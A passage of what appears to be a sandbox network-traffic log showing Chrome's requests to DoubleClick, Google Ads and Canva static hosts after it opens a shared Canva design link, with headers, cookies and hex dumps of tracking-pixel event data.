                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=CEzz%2BzYwahaIt5v168ErcRhEArlc8rqNzSzYP6PT3%2B1RpLkb%2FhQGUjBImUq33uceeeZR4CuicX8bhud0H4M3dnub114H%2FOCjl5%2BISM9wCKXFmuJxeFLOK97PuKYGUQ%3D%3D
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC585INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:39 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                    set-cookie: FPLC=NsGba152%2BSkmEfYI48S23W5P7wqUzR%2BfwwCHvOBEnIR3GO4uWMjjSZr1rI8jdCOhBYCXB7V43N7yfX12CfzICCEMyX%2BurQpgG%2Bwz%2B5hmoLtsUHY%2FtjmM2E3ExmyVDg%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC764INData Raw: 32 66 35 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 72 65 67 69 73 74 65 72 5f 63 6f 6e 76 65 72 73 69 6f 6e 3d 31 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 31 34 33 36 32 35 35 36 38 36 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c
                                                                                                                                                                                                                                                    Data Ascii: 2f5event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1436255686;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC714INData Raw: 32 63 33 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 31 34 33 36 32 35 35 36 38 36 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c 31 6c 31 3b 75 61 61 3d 78 38 36 3b 75 61 62 3d 36 34 3b 75 61 66
                                                                                                                                                                                                                                                    Data Ascii: 2c3event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=1436255686;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uaf
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1408INData Raw: 35 38 34 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 61 64 73 65 72 76 69 63 65 73 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 63 6f 6e 76 65 72 73 69 6f 6e 2f 38 30 34 37 35 37 30 37 39 2f 3f 72 61 6e 64 6f 6d 3d 37 36 38 35 32 34 37 39 38 26 66 73 74 3d 31 37 33 34 36 34 33 36 35 39 36 34 34 26 63 76 3d 31 30 26 66 6d 74 3d 33 26 6c 61 62 65 6c 3d 59 61 78 4b 43 4b 54 4a 6c 59 77 59 45 4e 65 38 33 76 38 43 26 62 67 3d 66 66 66 66 66 66 26 67 75 69 64 3d 4f 4e 26 75 5f 77 3d 31 32 38 30 26 75 5f 68 3d 31 30 32 34 26 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33
                                                                                                                                                                                                                                                    Data Ascii: 584event: messagedata: {"send_pixel":["https://www.googleadservices.com/pagead/conversion/804757079/?random=768524798&fst=1734643659644&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z98483
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC11INData Raw: 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: :true}}
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    71192.168.2.449823142.250.181.70443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1392OUTGET /activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1
                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Attribution-Reporting-Eligible: event-source, trigger;navigation-source
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC2966INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:40 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Attribution-Reporting-Register-Trigger: {"aggregatable_deduplication_keys":[{"deduplication_key":"4755682881022738973"}],"aggregatable_trigger_data":[{"filters":[{"14":["13079090"]}],"key_piece":"0xb2ca467de4b8703b","source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]},{"key_piece":"0x3c36a1cffc7e43e9","not_filters":{"14":["13079090"]},"source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]}],"aggregatable_values":{"12":65,"13":6 [TRUNCATED]
                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Set-Cookie: ar_debug=1; expires=Sat, 18-Jan-2025 21:27:40 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 19-Dec-2024 21:42:40 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    72192.168.2.449824142.250.181.70443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1297OUTGET /activity;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1
                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC1411INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:40 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Location: https://adservice.google.com/ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 19-Dec-2024 21:42:40 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    73192.168.2.449827142.250.181.70443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:39 UTC1611OUTGET /activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1
                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Attribution-Reporting-Eligible: not-navigation-source, trigger, event-source
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC2971INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:40 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Attribution-Reporting-Register-Trigger: {"aggregatable_deduplication_keys":[{"deduplication_key":"14078073121060000848"}],"aggregatable_trigger_data":[{"filters":[{"14":["16303776"]}],"key_piece":"0xe78a3ea2ad8a7037","source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]},{"key_piece":"0x9e1af8ddaae5efd4","not_filters":{"14":["16303776"]},"source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]}],"aggregatable_values":{"12":65,"13": [TRUNCATED]
                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Set-Cookie: ar_debug=1; expires=Sat, 18-Jan-2025 21:27:40 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 19-Dec-2024 21:42:40 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    74192.168.2.449829104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC1582OUTGET /web/42edacda53f68fee.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=2T%2FHjvwIcR1Yv1KUZyE1XM3g5yHM7Ueg6SXwK98npqpmNPGujqz283%2BH7z3YXCGTaBOYrY6iImyNJB3UfgG0MAfgwR%2By6OkRC1F0AamReO7sX9JXuMFwmDYBaQJ%2FiQ%3D% [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC1184INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                    Content-Length: 1795
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a5fba968cb4-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 2386468
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "586e9dea59811305119f635ad458a7d8"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:26 GMT
                                                                                                                                                                                                                                                    Last-Modified: Fri, 22 Nov 2024 00:19:35 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sun, 23 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: RwAJBQ20FVExjTCWLtGeBdyJNppt1/f8rHAU5wmMhGN5U52qouDKYG0HcMZrqDLUfK7eiHtZkvM=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: PDCWF46N3269NK5Q
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: FSrOfwbosdCDKu2yHL3B53Pmj.gkQVJP
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 59 4a 69 33 78 55 6c 6d 4c 33 53 39 42 4f 62 5a 53 77 4c 74 71 39 6e 71 75 6f 68 6b 62 6d 41 69 51 39 25 32 42 36 62 77 4e 30 34 73 69 35 4a 53 76 55 35 25 32 42 78 65 50 6b 4c 76 6e 59 5a 41 48 56 67 4b 73 51 4a 57 42 50 36 45 36 73 5a 45 62 6e 68 4b 6e 36 79 53 39 4d 5a 70 71 25 32 42 49 72 31 39 63 56 61 46 38 45 51 25 32 42 4d 5a 35 61 45 46 4d 62 39 70 67 53 6f 32 45 5a 6d 36 33 44 53 5a 63 47 46 6a 6f 76 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJi3xUlmL3S9BObZSwLtq9nquohkbmAiQ9%2B6bwN04si5JSvU5%2BxePkLvnYZAHVgKsQJWBP6E6sZEbnhKn6yS9MZpq%2BIr19cVaF8EQ%2BMZ5aEFMb9pgSo2EZm63DSZcGFjovU%3D"}],"group":"cf-nel","max_age":6048
